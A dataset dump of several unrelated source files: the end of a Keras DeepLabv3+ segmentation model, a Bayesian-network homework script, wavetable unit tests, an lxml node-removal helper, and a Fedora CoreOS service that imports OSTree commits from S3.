alpha=1.\n # Returns\n A Keras model instance.\n # Raises\n RuntimeError: If attempting to run this model with a\n backend that does not support separable convolutions.\n ValueError: in case of invalid argument for `weights` or `backbone`\n \"\"\"\n\n if not (weights in {'pascal_voc', 'cityscapes', None}):\n raise ValueError('The `weights` argument should be either '\n '`None` (random initialization), `pascal_voc`, or `cityscapes` '\n '(pre-trained on PASCAL VOC)')\n\n if not (backbone in {'xception', 'mobilenetv2'}):\n raise ValueError('The `backbone` argument should be either '\n '`xception` or `mobilenetv2` ')\n\n if input_tensor is None:\n img_input = Input(shape=input_shape)\n else:\n img_input = input_tensor\n\n if backbone == 'xception':\n if OS == 8:\n entry_block3_stride = 1\n middle_block_rate = 2 # ! 
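The docstring above fully determines a basic call. A hypothetical usage sketch — assuming this file is importable as `models`, per its `sub_path`, and that the argument values follow the documented defaults:

```python
from models import Deeplabv3

# Random initialization, MobileNetV2 backbone, three output classes on
# 256x256 RGB inputs, softmax on top for per-pixel class probabilities.
model = Deeplabv3(weights=None,
                  input_shape=(256, 256, 3),
                  classes=3,
                  backbone='mobilenetv2',
                  OS=16, alpha=1.0, activation='softmax')
model.summary()
```

Note that per the docstring, `OS` only affects the xception backbone (the mobilenetv2 branch forces `OS = 8` internally), and pretrained weights are only available for `alpha = 1`.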
Not mentioned in paper, but required\n exit_block_rates = (2, 4)\n atrous_rates = (12, 24, 36)\n else:\n entry_block3_stride = 2\n middle_block_rate = 1\n exit_block_rates = (1, 2)\n atrous_rates = (6, 12, 18)\n\n x = Conv2D(32, (3, 3), strides=(2, 2),\n name='entry_flow_conv1_1', use_bias=False, padding='same')(img_input)\n x = BatchNormalization(name='entry_flow_conv1_1_BN')(x)\n x = Activation('relu')(x)\n\n x = _conv2d_same(x, 64, 'entry_flow_conv1_2', kernel_size=3, stride=1)\n x = BatchNormalization(name='entry_flow_conv1_2_BN')(x)\n x = Activation('relu')(x)\n\n x = _xception_block(x, [128, 128, 128], 'entry_flow_block1',\n skip_connection_type='conv', stride=2,\n depth_activation=False)\n x, skip1 = _xception_block(x, [256, 256, 256], 'entry_flow_block2',\n skip_connection_type='conv', stride=2,\n depth_activation=False, return_skip=True)\n\n x = _xception_block(x, [728, 728, 728], 'entry_flow_block3',\n skip_connection_type='conv', stride=entry_block3_stride,\n depth_activation=False)\n for i in range(16):\n x = _xception_block(x, [728, 728, 728], 'middle_flow_unit_{}'.format(i + 1),\n skip_connection_type='sum', stride=1, rate=middle_block_rate,\n depth_activation=False)\n\n x = _xception_block(x, [728, 1024, 1024], 'exit_flow_block1',\n skip_connection_type='conv', stride=1, rate=exit_block_rates[0],\n depth_activation=False)\n x = _xception_block(x, [1536, 1536, 2048], 'exit_flow_block2',\n skip_connection_type='none', stride=1, rate=exit_block_rates[1],\n depth_activation=True)\n\n else:\n OS = 8\n first_block_filters = _make_divisible(32 * alpha, 8)\n x = Conv2D(first_block_filters,\n kernel_size=3,\n strides=(2, 2), padding='same',\n use_bias=False, name='Conv')(img_input)\n x = BatchNormalization(\n epsilon=1e-3, momentum=0.999, name='Conv_BN')(x)\n x = Activation(relu6, name='Conv_Relu6')(x)\n\n x = _inverted_res_block(x, filters=16, alpha=alpha, stride=1,\n expansion=1, block_id=0, skip_connection=False)\n\n x = _inverted_res_block(x, filters=24, alpha=alpha, stride=2,\n expansion=6, block_id=1, skip_connection=False)\n x = _inverted_res_block(x, filters=24, alpha=alpha, stride=1,\n expansion=6, block_id=2, skip_connection=True)\n\n x = _inverted_res_block(x, filters=32, alpha=alpha, stride=2,\n expansion=6, block_id=3, skip_connection=False)\n x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,\n expansion=6, block_id=4, skip_connection=True)\n x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,\n expansion=6, block_id=5, skip_connection=True)\n\n # stride in block 6 changed from 2 -> 1, so we need to use rate = 2\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, # 1!\n expansion=6, block_id=6, skip_connection=False)\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=7, skip_connection=True)\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=8, skip_connection=True)\n x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=9, skip_connection=True)\n\n x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=10, skip_connection=False)\n x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=11, skip_connection=True)\n x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,\n expansion=6, block_id=12, skip_connection=True)\n\n x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=2, # 1!\n expansion=6, 
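The xception branch derives its strides and atrous rates from the requested output stride; the mapping wired above can be restated as data (a summary of the code, not new behavior):

```python
# output stride -> (entry_block3_stride, middle_block_rate,
#                   exit_block_rates, atrous_rates) for the xception
# backbone; the mobilenetv2 branch always forces OS = 8.
XCEPTION_OS_CONFIG = {
    8:  (1, 2, (2, 4), (12, 24, 36)),
    16: (2, 1, (1, 2), (6, 12, 18)),
}

stride, middle_rate, exit_rates, aspp_rates = XCEPTION_OS_CONFIG[16]
assert aspp_rates == (6, 12, 18)
```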
block_id=13, skip_connection=False)\n x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,\n expansion=6, block_id=14, skip_connection=True)\n x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,\n expansion=6, block_id=15, skip_connection=True)\n\n x = _inverted_res_block(x, filters=320, alpha=alpha, stride=1, rate=4,\n expansion=6, block_id=16, skip_connection=False)\n\n # end of feature extractor\n\n # branching for Atrous Spatial Pyramid Pooling\n\n # Image Feature branch\n import tensorflow as tf\n shape_before = tf.shape(x)\n b4 = GlobalAveragePooling2D()(x)\n # from (b_size, channels)->(b_size, 1, 1, channels)\n b4 = Lambda(lambda x: K.expand_dims(x, 1))(b4)\n b4 = Lambda(lambda x: K.expand_dims(x, 1))(b4)\n b4 = Conv2D(256, (1, 1), padding='same',\n use_bias=False, name='image_pooling')(b4)\n b4 = BatchNormalization(name='image_pooling_BN', epsilon=1e-5)(b4)\n b4 = Activation('relu')(b4)\n # upsample. have to use compat because of the option align_corners\n size_before = tf.keras.backend.int_shape(x)\n b4 = Lambda(lambda x: tf.image.resize_bilinear(x, size_before[1:3]))(b4)\n # simple 1x1\n b0 = Conv2D(256, (1, 1), padding='same', use_bias=False, name='aspp0')(x)\n b0 = BatchNormalization(name='aspp0_BN', epsilon=1e-5)(b0)\n b0 = Activation('relu', name='aspp0_activation')(b0)\n\n # there are only 2 branches in mobilenetV2. not sure why\n if backbone == 'xception':\n # rate = 6 (12)\n b1 = SepConv_BN(x, 256, 'aspp1',\n rate=atrous_rates[0], depth_activation=True, epsilon=1e-5)\n # rate = 12 (24)\n b2 = SepConv_BN(x, 256, 'aspp2',\n rate=atrous_rates[1], depth_activation=True, epsilon=1e-5)\n # rate = 18 (36)\n b3 = SepConv_BN(x, 256, 'aspp3',\n rate=atrous_rates[2], depth_activation=True, epsilon=1e-5)\n\n # concatenate ASPP branches & project\n x = Concatenate()([b4, b0, b1, b2, b3])\n else:\n x = Concatenate()([b4, b0])\n\n x = Conv2D(256, (1, 1), padding='same',\n use_bias=False, name='concat_projection')(x)\n x = BatchNormalization(name='concat_projection_BN', epsilon=1e-5)(x)\n x = Activation('relu')(x)\n x = Dropout(0.1)(x)\n # DeepLab v.3+ decoder\n\n if backbone == 'xception':\n # Feature projection\n # x4 (x2) block\n size_before2 = tf.keras.backend.int_shape(x)\n x = Lambda(lambda xx: tf.image.resize_bilinear(xx,size_before2[1:3] * tf.constant(OS // 4)))(x)\n\n dec_skip1 = Conv2D(48, (1, 1), padding='same',\n use_bias=False, name='feature_projection0')(skip1)\n dec_skip1 = BatchNormalization(\n name='feature_projection0_BN', epsilon=1e-5)(dec_skip1)\n dec_skip1 = Activation('relu')(dec_skip1)\n x = Concatenate()([x, dec_skip1])\n x = SepConv_BN(x, 256, 'decoder_conv0',\n depth_activation=True, epsilon=1e-5)\n x = SepConv_BN(x, 256, 'decoder_conv1',\n depth_activation=True, epsilon=1e-5)\n\n # you can use it with arbitary number of classes\n if (weights == 'pascal_voc' and classes == 21) or (weights == 'cityscapes' and classes == 19):\n last_layer_name = 'logits_semantic'\n else:\n last_layer_name = 'custom_logits_semantic'\n\n x = Conv2D(classes, (1, 1), padding='same', name=last_layer_name)(x)\n size_before3 = tf.keras.backend.int_shape(img_input)\n x = Lambda(lambda xx: tf.image.resize_bilinear(xx,size_before3[1:3]))(x)\n\n # Ensure that the model takes into account\n # any potential predecessors of `input_tensor`.\n if input_tensor is not None:\n inputs = get_source_inputs(input_tensor)\n else:\n inputs = img_input\n\n if activation in {'softmax', 'sigmoid'}:\n x = tf.keras.layers.Activation(activation)(x)\n\n model = Model(inputs, 
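`tf.image.resize_bilinear` is a TF1 symbol; under TF2 it survives only as `tf.compat.v1.image.resize_bilinear`, and the usual replacement is `tf.image.resize` with the bilinear method. A hedged sketch of the same upsampling `Lambda` for TF2 — the align-corners semantics of the two APIs differ slightly, so this is an approximation rather than a drop-in:

```python
import tensorflow as tf
from tensorflow.keras.layers import Lambda

def bilinear_upsample(target_hw):
    # TF2 stand-in for Lambda(lambda x: tf.image.resize_bilinear(x, target_hw))
    return Lambda(lambda x: tf.image.resize(x, target_hw, method='bilinear'))

x = tf.random.normal((1, 16, 16, 256))
y = bilinear_upsample((64, 64))(x)
assert y.shape == (1, 64, 64, 256)
```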
x, name='deeplabv3plus')\n\n # load weights\n\n if weights == 'pascal_voc':\n if backbone == 'xception':\n weights_path = get_file('deeplabv3_xception_tf_dim_ordering_tf_kernels.h5',\n WEIGHTS_PATH_X,\n cache_subdir='models')\n else:\n weights_path = get_file('deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels.h5',\n WEIGHTS_PATH_MOBILE,\n cache_subdir='models')\n model.load_weights(weights_path, by_name=True)\n elif weights == 'cityscapes':\n if backbone == 'xception':\n weights_path = get_file('deeplabv3_xception_tf_dim_ordering_tf_kernels_cityscapes.h5',\n WEIGHTS_PATH_X_CS,\n cache_subdir='models')\n else:\n weights_path = get_file('deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels_cityscapes.h5',\n WEIGHTS_PATH_MOBILE_CS,\n cache_subdir='models')\n model.load_weights(weights_path, by_name=True)\n return model\n\ndef modelCreator(modelName,inputShape,classes,weights=None):\n if modelName==\"PathoNet\":\n model=PathoNet(input_size = inputShape, classes=classes,pretrained_weights = weights)\n elif modelName==\"FRRN_A\":\n model=FCRN_A(inputShape,classes=classes,pretrained_weights = weights)\n elif modelName==\"FCRN_B\":\n model=FCRN_B(inputShape,classes=classes,pretrained_weights = weights)\n elif modelName==\"Deeplab_xception\":\n model=Deeplabv3(weights=None, input_shape=inputShape, classes=classes, backbone='xception',\n OS=16, alpha=1., activation=None)\n model.summary()\n if weights!= None:\n model.load_weights(weights)\n elif modelName==\"Deeplab_mobilenet\":\n model=Deeplabv3(weights=None, input_shape=inputShape, classes=classes, backbone='mobilenetv2',\n OS=16, alpha=1., activation=None)\n model.summary()\n if weights!= None:\n model.load_weights(weights)\n else:\n raise ValueError('The `model` argument should be either '\n 'PathoNet,FRRN_A,FCRN_B,Deeplab_xception or Deeplab_mobilenet')\n return model\n ","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":30642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"596632148","text":"'''\nThis module implements the Bayesian network shown in the text, Figure 14.12a.\nIt's taken from the AIMA Python code.\n\n@author: kvlinden\n@version Jan 2, 2013\n\nModified by Roy Adams on 3/6/19 for CS344 at Calvin College.\n'''\n\nfrom probability import BayesNet, enumeration_ask, elimination_ask\n\n# Utility variables\nT, F = True, False\n\n# From AIMA code (probability.py) - Fig. 
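The `modelCreator` factory matches model names literally, so note the asymmetry that the string `"FRRN_A"` (not `"FCRN_A"`) is what selects the `FCRN_A` builder. A hypothetical call, assuming the file is importable as `models`:

```python
from models import modelCreator

# Builds PathoNet with random weights; pass a weights path to load one.
model = modelCreator("PathoNet", inputShape=(256, 256, 3),
                     classes=3, weights=None)
```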
14.2 - burglary example\nwet_grass = BayesNet([\n ('Cloudy', '', 0.5),\n ('Sprinkler', 'Cloudy', {T: 0.1, F: 0.5}),\n ('Rain', 'Cloudy', {T: 0.8, F: 0.2}),\n ('WetGrass', 'Sprinkler Rain', {(T, T): 0.99, (T, F): 0.9, (F, T): 0.9, (F, F): 0.0}),\n ])\n\n# P(Cloudy) = <0.5, 0.5> This is directly from graph.\nprint(enumeration_ask('Cloudy', dict(), wet_grass).show_approx())\n\n# P(Sprinkler|Cloudy) = <0.1, 0.9> This is directly from graph.\nprint(enumeration_ask('Sprinkler', dict(Cloudy=T), wet_grass).show_approx())\n\n# P(Cloudy|Sprinkler, -Rain) = a * P(Sprinkler, -Rain|Cloudy) * P(Cloudy) = a * <0.1 * 0.2 * 0.5, 0.5 * 0.8 * 0.5> = <0.0476, 0.9524>\nprint(enumeration_ask('Cloudy', dict(Sprinkler=T, Rain=F), wet_grass).show_approx())\n\n# P(WetGrass|Cloudy, Sprinkler, Rain) = <0.99, 0.01> This is directly from graph.\nprint(enumeration_ask('WetGrass', dict(Cloudy=T, Sprinkler=T, Rain=T), wet_grass).show_approx())\n\n# P(Cloudy|-WetGrass) = a * P(-WetGrass|Cloudy) * P(Cloudy) =\n# a * [P(-WetGrass|Sprinkler, Rain) * P(Sprinkler|Cloudy) * P(Rain|Cloudy)\n# + P(-WetGrass|Sprinkler, -Rain) * P(Sprinkler|Cloudy) * P(-Rain|Cloudy)\n# + P(-WetGrass|-Sprinkler, Rain) * P(-Sprinkler|Cloudy) * P(Rain|Cloudy)\n# + P(-WetGrass|-Sprinkler, -Rain) * P(-Sprinkler|Cloudy) * P(-Rain|Cloudy)] * P(Cloudy) =\n# a * <[0.01 * 0.1 * 0.8 + 0.9 * 0.1 * 0.2 + 0.9 * 0.9 * 0.8 + 0.0 * 0.9 * 0.2] * 0.5,\n# <[0.01 * 0.5 * 0.2 + 0.9 * 0.5 * 0.8 + 0.9 * 0.5 * 0.2 + 0.0 * 0.5 * 0.8] * 0.5> = <0.639, 0.361>\nprint(enumeration_ask('Cloudy', dict(WetGrass=F), wet_grass).show_approx())\n","sub_path":"homework2/weather_bayes.py","file_name":"weather_bayes.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27205955","text":"import tempfile\nimport random\nimport re\n\nfrom unittest import TestCase\nfrom pippi import wavetables, dsp, graph\n\nclass TestWavetables(TestCase):\n def test_random_window(self):\n length = random.randint(1, 1000)\n win = wavetables.window(dsp.RND, length)\n self.assertEqual(length, len(win))\n\n def test_bad_window_type(self):\n length = random.randint(1, 1000)\n self.assertRaises(TypeError, wavetables.window, 'this is not a window type', length)\n\n def test_random_wavetable(self):\n length = random.randint(1, 1000)\n wt = wavetables.wavetable(dsp.RND, length)\n self.assertEqual(length, len(wt))\n\n def test_bad_wavetable_type(self):\n length = random.randint(1, 1000)\n self.assertRaises(TypeError, wavetables.wavetable, 'this is not a wavetable type', length)\n\n def test_wtclass(self):\n wt1 = dsp.wt(dsp.RND, 4096)\n wt2 = dsp.wt(dsp.TRI, 4096)\n wt3 = dsp.wt([ random.random()+0.001 for _ in range(1000) ], 1000)\n\n self.assertTrue(max(wt1) > 0)\n self.assertTrue(max(wt2) > 0)\n self.assertTrue(max(wt3) > 0)\n self.assertEqual(len(wt1), 4096)\n self.assertEqual(len(wt2), 4096)\n self.assertEqual(len(wt3), 1000)\n\n \"\"\"\n def test_polyseg(self):\n score = 'sine 1,tri,0-1 rand,0.3-0.8'\n length = random.randint(100, 1000)\n for segment in score.split(' '):\n match = wavetables.SEGMENT_RE.match(segment)\n\n \n wt = wavetables.polyseg(score, length)\n\n self.assertEqual(len(wt), length)\n \"\"\"\n\n def test_randline(self):\n numpoints = random.randint(1, 10)\n wtsize = random.randint(10, 1000)\n\n wt = wavetables.randline(numpoints, wtsize=wtsize)\n self.assertEqual(len(wt), wtsize)\n\n lowvalue = random.triangular(0, 1)\n highvalue = random.triangular(1, 5)\n wt = wavetables.randline(numpoints, \n 
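The header comment above still says "Fig. 14.2 - burglary example", but the network it defines is the Figure 14.12a wet-grass model named in the module docstring. The inline derivation of P(Cloudy | Sprinkler, ¬Rain) can be checked without the AIMA library — pure Python, numbers copied from the CPTs above:

```python
# P(C | s, ~r) is proportional to P(s | C) * P(~r | C) * P(C)
p_true  = 0.1 * (1 - 0.8) * 0.5   # Cloudy = True:  0.01
p_false = 0.5 * (1 - 0.2) * 0.5   # Cloudy = False: 0.2
norm = p_true + p_false
print(round(p_true / norm, 4), round(p_false / norm, 4))  # 0.0476 0.9524
```

This matches the `<0.0476, 0.9524>` quoted in the comment, up to the ordering that `show_approx()` prints.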
lowvalue=lowvalue, \n highvalue=highvalue, \n wtsize=wtsize\n )\n\n self.assertEqual(len(wt), wtsize)\n self.assertTrue(max(wt) <= highvalue)\n self.assertTrue(min(wt) >= lowvalue)\n\n\n","sub_path":"tests/test_wavetables.py","file_name":"test_wavetables.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"342108807","text":"def remove_node_keep_tail(node):\n '''\n The simplest way to remove a node from the lxml parse tree is to directly remove it from the parent with the code:\n\n > node.getparent().remove(node)\n\n This can have unexpected behavior when tags have tail text,\n as the tail text will also be removed.\n This function removes the html tag without removing the tail text.\n\n For details on tail text, see: https://docs.python.org/3/library/xml.etree.elementtree.html#xml.etree.ElementTree.Element.tail\n '''\n parent = node.getparent()\n if parent is not None:\n if node.tail:\n prev = node.getprevious()\n if prev is None:\n if not parent.text:\n parent.text = ''\n parent.text += ' ' + node.tail\n else:\n if not prev.tail:\n prev.tail = ''\n prev.tail += ' ' + node.tail\n node.clear()\n parent.remove(node)\n\n","sub_path":"metahtml/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366044741","text":"#!/usr/bin/python3\n\nimport boto3\nimport botocore\nimport fedora_messaging\nimport fedora_messaging.api\nimport hashlib\nimport json\nimport logging\nimport os\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nimport traceback\n\n# Set local logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nFEDORA_MESSAGING_TOPIC_LISTEN = (\n \"org.fedoraproject.prod.coreos.build.request.ostree-import\"\n)\nFEDORA_MESSAGING_TOPIC_RESPOND = FEDORA_MESSAGING_TOPIC_LISTEN + \".finished\"\n\n\n# We are processing the org.fedoraproject.prod.coreos.build.request.ostree-import topic\n# https://apps.fedoraproject.org/datagrepper/raw?topic=org.fedoraproject.prod.coreos.build.request.ostree-import&delta=100000\n# The schema was originally designed in:\n# https://github.com/coreos/fedora-coreos-tracker/issues/198#issuecomment-513944390\nEXAMPLE_MESSAGE_BODY = json.loads(\"\"\"\n{\n \"build_id\": \"30.20190905.0\",\n \"stream\": \"testing\",\n \"basearch\": \"x86_64\",\n \"commit\": \"s3://fcos-builds/prod/streams/testing/builds/30.20190905.0/x86_64/ostree-commit.tar\",\n \"checksum\": \"sha256:d01db6939e7387afa2492ac8e2591c53697fc21cf16785585f7f1ac0de692863\",\n \"ostree_ref\": \"fedora/x86_64/coreos/testing\",\n \"ostree_checksum\": \"b4beca154dab3696fd04f32ddab818102caa9247ec3192403adb9aaecc991bd9\",\n \"target_repo\": \"prod\"\n}\n\"\"\"\n)\n\nKNOWN_OSTREE_REPOS = {\n \"prod\": \"/mnt/koji/ostree/repo\",\n \"compose\": \"/mnt/koji/compose/ostree/repo\",\n}\n\n# Given a repo (and thus an input JSON) analyze existing koji tag set\n# and tag in any missing packages\nclass Consumer(object):\n def __init__(self):\n # Check the possible repos to make sure they exist\n for path in KNOWN_OSTREE_REPOS.values():\n if not ostree_repo_exists(path):\n raise Exception(f\"OSTree repo does not exist at {path}\")\n\n logger.info(\n \"Processing messages with topic: %s\" % FEDORA_MESSAGING_TOPIC_LISTEN\n )\n\n def __call__(self, message: fedora_messaging.api.Message):\n # Catch any exceptions and don't raise them further because\n # it will cause 
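The docstring's point about tail text is easy to demonstrate: a bare `parent.remove(node)` silently drops `node.tail`, while the helper splices the tail into the previous sibling or the parent's text first. A self-contained check, restating the relevant branch of the helper so the snippet runs alone:

```python
from lxml import etree

def remove_keep_tail(node):
    # Minimal version of remove_node_keep_tail above: re-home the tail
    # text before detaching the node from its parent.
    parent = node.getparent()
    if node.tail:
        prev = node.getprevious()
        if prev is None:
            parent.text = (parent.text or '') + ' ' + node.tail
        else:
            prev.tail = (prev.tail or '') + ' ' + node.tail
    parent.remove(node)

root = etree.fromstring('<p>intro<b>bold</b>tail</p>')
remove_keep_tail(root.find('b'))
print(etree.tostring(root))  # b'<p>intro tail</p>' -- tail text survives
```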
/usr/bin/fedora-messaging to crash and we'll\n # lose the traceback logs from the container\n try:\n self.process(message)\n logger.info(\"Sending SUCCESS message\")\n send_message(msg=message.body, status=\"SUCCESS\")\n except Exception as e:\n logger.error(\"Caught Exception!\")\n logger.error(\"###################################\")\n traceback.print_exc()\n logger.error(\"###################################\")\n logger.error(\"Replying with a FAILURE message...\")\n send_message(msg=message.body, status=\"FAILURE\")\n logger.error(\"\\t continuing...\")\n pass\n\n def process(self, message: fedora_messaging.api.Message):\n logger.debug(message.topic)\n logger.debug(message.body)\n\n # Grab the raw message body and parse out pieces\n msg = message.body\n basearch = msg[\"basearch\"]\n build_id = msg[\"build_id\"]\n checksum = msg[\"checksum\"]\n commit_url = msg[\"commit\"]\n ostree_checksum = msg[\"ostree_checksum\"]\n ostree_ref = msg[\"ostree_ref\"]\n stream = msg[\"stream\"]\n target_repo = msg[\"target_repo\"]\n\n # Qualify arguments\n if not checksum.startswith(\"sha256:\"):\n raise Exception(\"checksum value must start with sha256:\")\n if target_repo not in KNOWN_OSTREE_REPOS.keys():\n raise Exception(f\"Provided target repo is unknown: {target_repo}\")\n\n sha256sum = checksum[7:]\n target_repo_path = KNOWN_OSTREE_REPOS[target_repo]\n source_repo_path = None\n\n # Detect if the commit already exists in the target repo\n # NOTE: We assume here that an import won't be requested twice for\n # the same commit (i.e. someone adds detached metadata and\n # then does a second import request).\n if ostree_commit_exists(target_repo_path, ostree_checksum):\n logger.info(\n f\"Commit {ostree_checksum} already exists in the target repo. \"\n \"Skipping import\"\n )\n return\n\n # Import the OSTree commit to the specified repo. We'll use\n # a temporary directory to untar the repo into.\n with tempfile.TemporaryDirectory() as tmpdir:\n # If the target repo is the prod repo the commit could\n # already have been imported into the compose repo. If it\n # is already in the compose repo then let's just pull-local\n # from there to save downloading all from the net again.\n if target_repo == \"prod\" and ostree_commit_exists(\n repo=KNOWN_OSTREE_REPOS[\"compose\"], commit=ostree_checksum\n ):\n logger.info(\"Commit exists in compose repo. 
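The `sha256:` prefix convention is enforced by plain string inspection before `checksum[7:]` strips it. A small helper capturing the same contract (hypothetical name, mirroring the inline checks in `process`, with the digest taken from `EXAMPLE_MESSAGE_BODY`):

```python
def split_checksum(checksum: str) -> str:
    # Same contract as the inline check above: require a "sha256:"
    # prefix and return the bare hex digest that follows it.
    if not checksum.startswith("sha256:"):
        raise ValueError("checksum value must start with sha256:")
    return checksum[len("sha256:"):]

digest = split_checksum(
    "sha256:d01db6939e7387afa2492ac8e2591c53697fc21cf16785585f7f1ac0de692863")
assert len(digest) == 64  # a SHA-256 digest is 64 hex characters
```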
Importing from there\")\n source_repo_path = KNOWN_OSTREE_REPOS[\"compose\"]\n else:\n # Grab the file from s3 and then pull local\n untar_file_from_s3(url=commit_url, tmpdir=tmpdir, sha256sum=sha256sum)\n source_repo_path = tmpdir\n\n # one more sanity check: make sure buildid == version\n assert_commit_has_version(\n repo=source_repo_path, commit=ostree_checksum, version=build_id\n )\n # Import the commit into the target repo\n ostree_pull_local(\n commit=ostree_checksum,\n dstrepo=target_repo_path,\n srcrepo=source_repo_path,\n branch=ostree_ref,\n )\n\n\ndef runcmd(cmd: list, **kwargs: int) -> subprocess.CompletedProcess:\n try:\n # default args to pass to subprocess.run\n pargs = {\"check\": True, \"capture_output\": True}\n logger.debug(f\"Running command: {cmd}\")\n pargs.update(kwargs)\n cp = subprocess.run(cmd, **pargs)\n except subprocess.CalledProcessError as e:\n logger.error(\"Command returned bad exitcode\")\n logger.error(f\"COMMAND: {cmd}\")\n logger.error(f\" STDOUT: {e.stdout.decode()}\")\n logger.error(f\" STDERR: {e.stderr.decode()}\")\n raise e\n return cp # subprocess.CompletedProcess\n\n\ndef send_message(msg: dict, status: str):\n # Send back a message with all the original message body\n # along with an additional `status:` header with either\n # `SUCCESS` or `FAILURE`.\n fedora_messaging.api.publish(\n fedora_messaging.message.Message(\n topic=FEDORA_MESSAGING_TOPIC_RESPOND, body={\"status\": status, **msg}\n )\n )\n\n\n# https://stackoverflow.com/a/55542529\ndef get_sha256sum(filepath: str) -> str:\n h = hashlib.sha256()\n with open(filepath, \"rb\") as file:\n while True:\n # Reading is buffered, so we can read smaller chunks.\n chunk = file.read(h.block_size)\n if not chunk:\n break\n h.update(chunk)\n return h.hexdigest()\n\n\ndef parse_s3_url(url: str) -> tuple:\n if not url.startswith(\"s3://\"):\n raise Exception(f\"Unable to parse the s3 url: {url}\")\n # Chop off s3:// and break into bucket / key\n bucket, key = url[5:].split(\"/\", 1)\n return (bucket, key)\n\n\ndef untar_file_from_s3(url: str, tmpdir: str, sha256sum: str):\n filename = \"ostree.tar\"\n filepath = os.path.join(tmpdir, filename)\n\n # Grab file from s3\n logger.info(f\"Downloading object from s3: {url}\")\n s3 = boto3.client(\"s3\")\n bucket, key = parse_s3_url(url)\n s3.download_file(bucket, key, filepath)\n\n # Verify file has correct checksum\n calcuatedsum = get_sha256sum(filepath)\n if sha256sum != calcuatedsum:\n raise Exception(\"Checksums do not match: \" f\"{sha256sum} != {calcuatedsum}\")\n\n # Untar the file into the temporary directory\n with tarfile.open(filepath) as tar:\n tar.extractall(path=tmpdir)\n\n\ndef ostree_pull_local(srcrepo: str, dstrepo: str, branch: str, commit: str):\n # verify the parent commit of the new commit is in the destination repo\n # and also that the current branch in the repo points to it\n branch_exists = ostree_branch_exists(repo=dstrepo, branch=branch)\n parent = ostree_get_parent_commit(repo=srcrepo, commit=commit)\n if branch_exists:\n assert_branch_points_to_commit(repo=dstrepo, branch=branch, commit=parent)\n # pull content\n logger.info(\"Running ostree pull-local to perform import\")\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"pull-local\", srcrepo, commit]\n runcmd(cmd)\n # update branch\n if branch_exists:\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"reset\", branch, commit]\n else:\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"refs\", f\"--create={branch}\", commit]\n logger.info(f\"Updating branch {branch} -> {commit} in 
{dstrepo}\")\n runcmd(cmd)\n # update summary file\n logger.info(\"Updating summary file\")\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"summary\", \"-u\"]\n runcmd(cmd)\n\n\ndef ostree_repo_exists(repo: str) -> bool:\n if not os.path.exists(repo):\n return False\n cmd = [\"ostree\", f\"--repo={repo}\", \"refs\"]\n if runcmd(cmd, check=False).returncode != 0:\n logger.debug(f\"OSTree repo does not exist at {repo}\")\n return False\n return True\n\n\ndef ostree_commit_exists(repo: str, commit: str) -> bool:\n cmd = [\"ostree\", f\"--repo={repo}\", \"show\", commit]\n return runcmd(cmd, check=False).returncode == 0\n\n\ndef ostree_branch_exists(repo: str, branch: str) -> bool:\n cmd = [\"ostree\", f\"--repo={repo}\", \"rev-parse\", branch]\n return runcmd(cmd, check=False).returncode == 0\n\n\ndef ostree_get_parent_commit(repo: str, commit: str) -> str:\n cmd = [\"ostree\", f\"--repo={repo}\", \"rev-parse\", f\"{commit}^\"]\n return runcmd(cmd, check=True).stdout.strip().decode()\n\n\ndef assert_branch_points_to_commit(repo: str, branch: str, commit: str):\n cmd = [\"ostree\", f\"--repo={repo}\", \"rev-parse\", branch]\n cp = runcmd(cmd, check=True)\n detected = cp.stdout.strip().decode()\n logger.debug(f\"{branch} points to {detected}\")\n if commit != detected:\n raise Exception(f\"{branch} points to {detected}. Expected {commit}\")\n\n\ndef assert_commit_has_version(repo: str, commit: str, version: str):\n cmd = [\"ostree\", f\"--repo={repo}\", \"show\", commit, \"--print-metadata-key=version\"]\n cp = runcmd(cmd, check=True)\n embeddedversion = cp.stdout.replace(b\"'\", b\"\").strip().decode()\n if version != embeddedversion:\n raise Exception(\n \"Embedded commit version does not match buildid \"\n f\"{version} != {embeddedversion}\"\n )\n\n\n# The code in this file is expected to be run through fedora messaging\n# However, you can run the script directly for testing purposes. 
